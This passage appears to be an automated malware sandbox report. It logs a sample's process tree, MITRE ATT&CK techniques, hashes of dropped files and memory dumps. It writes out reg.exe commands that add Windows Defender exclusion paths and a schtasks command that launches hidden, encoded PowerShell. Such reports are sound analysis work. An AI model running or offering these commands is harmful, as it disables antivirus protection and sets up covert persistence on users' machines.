  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ndsfoVoncIwTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1544
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RpVGcKpDfweuJrVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ndsfoVoncIwTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1452
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RpVGcKpDfweuJrVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:752
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1612
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:576
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:680
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1208
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NjoFBXFqU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1484
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NjoFBXFqU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1368
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eezsWfLNyAAU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eezsWfLNyAAU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hfJDFwXlTkShICPsXcR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hfJDFwXlTkShICPsXcR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lMwNpEhoLIUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lMwNpEhoLIUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ndsfoVoncIwTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ndsfoVoncIwTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1460
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RpVGcKpDfweuJrVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:568
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RpVGcKpDfweuJrVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:960
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gvRuvzWXi" /SC once /ST 11:08:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1180

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1536

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "52788088813846070561309294606348062334-970849844173143255678635241-1140184998"
1⤵
- Windows security bypass
PID:1188

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "56811764-12281499301994490348-16246368011652347005-1997169979-843048251-168719027"
1⤵
- Windows security bypass
PID:1520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-137363114223472508-1063352970-15012889604649091032130202398-17729825671155055185"
1⤵
- Windows security bypass
PID:812

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12334553267569530821434527563-1384281957543581810-1534707001835399125-1837658502"
1⤵
- Windows security bypass
PID:576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc\OmXsHziWlidBLVH\yaPnaYN.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc\OmXsHziWlidBLVH\yaPnaYN.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3a19b440627efd9df688e9a1cfeb31c8

SHA1
0bb46408ce65a82da0cf62acb3430de25e8062be

SHA256
a9e2eb93849b004fcd1d9f2d5385c9e5373d6f3cc6611044fd83a357ddb841ef

SHA512
594f7bf94eb1305df05ca37ddbbe4077b0969c37851fbf9638b88d76ee8d189a413dc3dc70a85a68095dc3ad80dedc4907e532238405a66539a2aa0fa1e735d3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4b864b97b2c000ffc7c16190fc6cfde1

SHA1
52586f979fc4e6886ffec82e3edb63224e5f26e9

SHA256
9a48620300fa18bf6f37ac6034f5068c35660a6020512ceaec6418e3939b66ac

SHA512
4187bf977211f3ef24e937ac8a6b28079e12980e74e64e8e94cbadf72d0b747faedb4e4e432d4fcad6c59b6890558419dbcc859aa2ebcf51221333dc6a35f595

Download Submit
C:\Windows\Temp\fEHCmfDBHLCPWEKC\hxpGyLXe\zqPasXghbsJVXrrI.wsf

Filesize
8KB

MD5
21bac32ffa085dcb4a7815c4a433c8eb

SHA1
75dfc75e57359f72aba6da6e589f7181df89ddb0

SHA256
9848d56751e38ba1e040ba99eb282da41d8fc4f9015a9b52eef59dd29ad0ffba

SHA512
50ab26c86c353e473a47a4636efc7a8787ea0164230c829cbd33e3fd7338bddd2e73abff1b2e0746d2e4a93f1f13807a11138c4d1395e8d840920df63dcba5a7

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe

Filesize
6.3MB

MD5
3222bd98c38c22117bcbf831a02ca652

SHA1
34fc0cf9541aa148766878a489d34081ab3ca540

SHA256
d04951684a247c571ff3a0f1e10bb4846072cc198f206aeeebf34d7674b55c54

SHA512
1e2f8d5d3c9a977a142445cac107a2fc0bf52c461feedf1527719f301d55118582ee54867d49c23745acd149d837b9c19aaa6a374c284521a5159f504f1e080a

Download Submit
\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe

Filesize
6.7MB

MD5
fc63623e39c0db76440faf4848b2e2af

SHA1
a149ff722dc1df6e1acbd384b70d2d282fbb6703

SHA256
3be972033804265ea9842c61e6cb5c200c69b554be4b97afeafcb7329b7ebf79

SHA512
b8cc9df8a4a1cf36eb37305e94a0f621ccaaad708f208218e402c5f50bcc1ec91feea0d57b056a6bfebfe52e25338d029b2fa3529aec84c20fff923aad98c271

Download Submit
memory/880-54-0x0000000075831000-0x0000000075833000-memory.dmp

Filesize
8KB

Download
memory/976-71-0x0000000010000000-0x0000000011000000-memory.dmp

Filesize
16.0MB

Download
memory/1608-122-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/1608-123-0x000000000240B000-0x000000000242A000-memory.dmp

Filesize
124KB

Download
memory/1608-119-0x000007FEF3B20000-0x000007FEF4543000-memory.dmp

Filesize
10.1MB

Download
memory/1608-120-0x000007FEF2FC0000-0x000007FEF3B1D000-memory.dmp

Filesize
11.4MB

Download
memory/1724-134-0x000007FEF3180000-0x000007FEF3BA3000-memory.dmp

Filesize
10.1MB

Download
memory/1724-135-0x000007FEEF420000-0x000007FEEFF7D000-memory.dmp

Filesize
11.4MB

Download
memory/1724-138-0x00000000026CB000-0x00000000026EA000-memory.dmp

Filesize
124KB

Download
memory/1724-137-0x00000000026C4000-0x00000000026C7000-memory.dmp

Filesize
12KB

Download
memory/1724-139-0x00000000026CB000-0x00000000026EA000-memory.dmp

Filesize
124KB

Download
memory/1816-99-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download
memory/1816-95-0x000007FEFC1B1000-0x000007FEFC1B3000-memory.dmp

Filesize
8KB

Download
memory/1816-96-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp

Filesize
10.1MB

Download
memory/1816-97-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

Download
memory/1816-98-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1816-101-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download